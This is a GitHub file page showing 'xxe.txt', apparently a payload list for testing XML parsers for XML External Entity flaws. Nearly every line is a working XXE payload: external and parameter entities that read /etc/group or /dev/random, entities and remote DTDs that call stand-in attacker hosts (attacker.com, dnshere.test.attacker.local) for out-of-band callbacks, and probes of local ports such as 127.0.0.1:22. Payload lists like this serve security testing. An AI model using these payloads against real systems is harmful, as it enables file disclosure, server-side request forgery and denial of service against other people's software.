-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathxxe.txt
15 lines (12 loc) · 908 Bytes
/
xxe.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<x>Static content</x>'
<!DOCTYPE x [ <!ENTITY foo "Some text"> ]><x>Internal entity: &foo;</x>'
<!DOCTYPE x [ <!ENTITY foo SYSTEM "file:///etc/group"> ]><x>External entity 1: &foo;</x>
<!DOCTYPE x [ <!ENTITY foo SYSTEM "file:///dev/random"> ]><x>External entity 2: &foo;</x>
<!DOCTYPE x [ <!ENTITY foo SYSTEM "http://dnshere.test.attacker.local/"> ]><x>External entity 3: &foo;</x>
<!DOCTYPE x [ <!ENTITY % foo SYSTEM "file:///etc/group"> %foo; ]><x>Parameter entity 1</x>
<!DOCTYPE x [ <!ENTITY % foo SYSTEM "file:///dev/random"> %foo; ]><x>Parameter entity 2</x>
<!DOCTYPE x [ <!ENTITY % foo SYSTEM "http://127.0.0.1/"> %foo; ]><x>Parameter entity 3</x>
<!DOCTYPE x SYSTEM "file:///etc/group"><x>Remote DTD 1</x>
<!DOCTYPE x SYSTEM "file:///dev/random"><x>Remote DTD 2</x>
<!DOCTYPE x SYSTEM "http://127.0.0.1:22/"><x>Remote DTD 3</x>
<!DOCTYPE x SYSTEM "http://attacker.com/xml.dtd"><x>Remote DTD 4</x>